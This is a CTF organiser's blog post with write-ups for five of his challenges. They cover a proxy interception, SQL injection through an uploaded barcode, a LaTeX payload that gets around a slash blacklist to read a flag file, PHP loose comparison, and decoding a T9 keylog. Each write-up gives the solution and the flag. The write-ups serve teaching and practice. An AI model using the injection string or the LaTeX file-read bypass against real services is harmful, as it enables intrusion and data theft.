Dev BlogIntroduction
I was an organiser for this CTF so the following write-ups are for challenges that I developed. The full repository with all of the challenges can be found here.
Man-in-the-Mirror
Category: Networks
Author: James Lowther (Articuler)
Description
And no message could have been any clearer…
Hints
- Where is the data getting filtered?
Solution
This challenge provides a website and a proxy. Going to the website without going through the proxy will return an error stating that you can’t get the flag this way. Connecting to the website through the proxy will indicate that the flag was returned, but was filtered out by the proxy before getting sent to you.
- To solve this challenge, we need to intercept the response from the website that was requested by the proxy before it is sent back to the proxy and filtered out. Somehow we need to get the request before it gets obfuscated by the proxy while still using the auth key generated by the proxy.
- To do this, write your own intercept proxy in a language like Python 3 which forwards all requests to the website and prints out the returned HTML.
- Next, send a request to your intercept proxy using the given proxy. By forwarding the proxy’s request through the intercept proxy you will be able to look at the returned HTML while still using the proxy’s authentication credentials. The flag will be in the body of this request.
Request normally
+----------+ Request +-----------+ Auth Key +-------------+
| | ----------> | | -----------> | |
| HOST | | PROXY | | WEBSITE |
| | <---------- | | <----------- | |
+----------+ Obfuscated +-----------+ Flag +-------------+
Flag
Request with intercept proxy
+----------+ Request +-----------+ Auth Key +---------------+ Auth Key +-------------+
| | ----------> | | ----------> | | ----------> | |
| HOST | | PROXY | | INTERCEPT | | WEBSITE |
| | | | | PROXY | <---------- | |
+----------+ +-----------+ +---------------+ Flag +-------------+
|
|
|
v
Flag
Retrieved
Here is an example of the intercept proxy:
import sys, socket
def main():
if (len(sys.argv) <= 3):
print(f"Usage: {sys.argv[0]} <intercept_port> <challenge_host> <challenge_port>")
exit(1)
my_port = int(sys.argv[1])
challenge_site = sys.argv[2]
challenge_port = int(sys.argv[3])
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('0.0.0.0', my_port))
serversocket.listen(5)
while True:
print(f"Waiting for connection on port {my_port}...")
(clientsocket, address) = serversocket.accept()
print("Client connected. Waiting to receive data...")
msg_byte = clientsocket.recv(1024)
print(f"Connecting to {challenge_site} on port {challenge_port}..." )
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((challenge_site, challenge_port))
print("Sending request from proxy...")
s.send(msg_byte)
print("Waiting to recieve data...")
data = s.recv(1024)
print("\n" + data.decode() + "\n")
print("Closing connection...")
clientsocket.close()
s.close()
main()Flag
magpie{1m_st4rt1ng_w1th_th3_m4n_1n_th3_m1ddl3}
Birdbuster Video
Category: Web Exploitation
Author: James Lowther (Articuler)
Description
Weren’t video rental stores the best?! See if you can break into this one!
Hints
- 80s action movies really inject you full of adrenaline!
Solution
This challenge gives provides you a website with the ability to upload a barcode. The website will “scan” this barcode and will return information about the movie title that was encoded.
- To solve this challenge, generate a barcode with a SQL injection that returns all rows using an online barcode generator.
- For example,
' OR 1=1; --
- For example,
- Upload the barcode to the website.
- The flag can be found at the bottom of the returned results.
Flag
magpie{80s_m0v135_4r3_th3_b35t}
Richard Simmons: Sweatin’ in LaTeX
Category: Web Exploitation
Author: James Lowther (Articuler)
Description
Richard Simmons’ new workout “Sweatin’ in LaTeX” is out now! See if you can shimmy your way to the flag!
Solution
The website appears to be a renderer for LaTeX code. Writing LaTex and clicking “Generate PDF” gives a link to a rendered PDf. The output LOG of the LaTeX renderer will also be displayed.
- Looking at the source HTML indicates that we need to read the flag from a file found in
/sweatin/to/the/oldies/flag.txt. - LaTeX is turing-complete and has the ability to read files, however, certain strings have been blacklisted. Most notably,
/has been blacklisted making it challenging to create the path to read the file. - The
/character however can be isolated fromindex.htmlusing the\StrMidfunction from thexstringpackage. By getting the/character fromindex.html, we can use it to build our path and bypass the blacklisted characters filter. - Using this we can write the following LaTeX code that will build the path and read the flag:
\documentclass{minimal}
% The xstring package allows us to use \StrMid
\usepackage{xstring}
% Define sections of the path to the flag
\def\a{sweatin}
\def\b{to}
\def\c{the}
\def\d{oldies}
\def\e{flag.txt}
% Read index.html and isolate the forward-s lash character into \s
\newread\file
\immediate\openin\file=index.html
\immediate\read\file to\fileline
\immediate\read\file to\fileline
\immediate\read\file to\fileline
\immediate\read\file to\fileline
\StrMid{\fileline}{43}{43}[\s]
\immediate\closein\file
% Build the path the the flag and read it
\immediate\openin\file=\s\a\s\b\s\c\s\d\s\e
\loop\unless\ifeof\file
\read\file to\fileline
\message{\fileline}
\repeat
\closein\file
\begin{document}
\end{document}The flag can be found in the returned LOG data.
Flag
magpie{r1ch4rd_l0v35_t0_5w34t}
The Smurfs Cipher
Category: Web Exploitation
Author: James Lowther (Articuler)
Description
Gargamel stole the key to decrypt The Smurfs ciphertext. Now they can’t get into their kingdom to view their flag. Can you help them get the right key?
Solution
This challenge gives you a file named cipher and the source code used to return the flag. Your goal is to reverse engineer the source code to create, and upload, the key that will allow the flag to be returned. This challenge requires you to exploit PHP loose comparison. In PHP versions less than 8 using == will loosely compare variables of different types, allowing expressions to implicitly evaluate to true. Any string (i.e. password.txt) compared with the integer 0 will evaluate to true. By making to_check equal to 0 we can echo the flag.
A table showing all of the PHP loose comparison values can be found here.
- In order to get the flag we need to ensure that
$to_checkis0to exploit PHP using loose comparison. - Create a 8 byte file that is equivalent to the data in
cipher + 0xd34db33fand upload it.- Your key will be XORed with
cipher + 0xd34db33f. If they are equivalent then the XOR result will be zero.
- Your key will be XORed with
- The if statement will be
0 == "whatever the password is"which evaluates to true, and the flag will be echoed back.
Flag
magpie{l0053_c0mp4r150n_l34d5_t0_tr0ub13}
DynaTAC 8000x Keylogger
Category: Forensics
Author: James Lowther (Articuler)
Description
The DynaTAC 8000X, released in 1983, was the first consumer cellphone ever sold. Somebody recently modified it to support texting and added a keylogger! Can you find out what message was sent? Note: wrap extracted data in magpie{}
Hints
- Take a look at 9-key texting on flip phones.
- Pay attention to when the keys were actually pressed.
Solution
This challenge provides you with a file including a bunch of keystrokes on a cell phone as well as the time the key was pressed. Keys need to be decoded to the letters that would be selected if pressed on a 9-key flip phone. The time between each sequence of presses is roughly 400ms and the time between each letter is roughly 1200ms. The BACKSPACE key represents an incorrect sequence and the user deleting a previously entered letter.
- To solve this challenge, write a script that looks at the keys and the time they were pressed and decodes each sequence of key presses back to the corresponding letter on a 9-key flip phone.
Here is an example script to decode the sequence:
filename = "keylog.txt"
# In ms
tap_time = 450
hold_time = 1300
t9_dict = {
"2" : "a",
"22" : "b",
"222" : "c",
"3" : "d",
"33" : "e",
"333" : "f",
"4" : "g",
"44" : "h",
"444" : "i",
"5" : "j",
"55" : "k",
"555" : "l",
"6" : "m",
"66" : "n",
"666" : "o",
"7" : "p",
"77" : "q",
"777" : "r",
"7777" : "s",
"8" : "t",
"88" : "u",
"888" : "v",
"9" : "w",
"99" : "x",
"999" : "y",
"9999" : "z"
}
def main():
# Read in the challenge data
in_file = open(filename, "r")
data = in_file.readlines()[5:]
c_time = 0
seq = ""
flag = ""
for line in data:
x = line.rstrip("\n")
(time, key) = x.split(" : ")
# Calculate change in time
delta_time = int(time) - c_time
# Intermediate key press
if delta_time < tap_time:
seq = seq + key
# Letter selected
else:
if seq:
flag = flag + t9_dict[seq]
if key == "BACKSPACE":
flag = flag[:-1]
seq = ""
else:
seq = key
c_time = int(time)
print(flag)
in_file.close()
main()Flag
magpie{itstoobadtextingwasnotevenathingbackthen}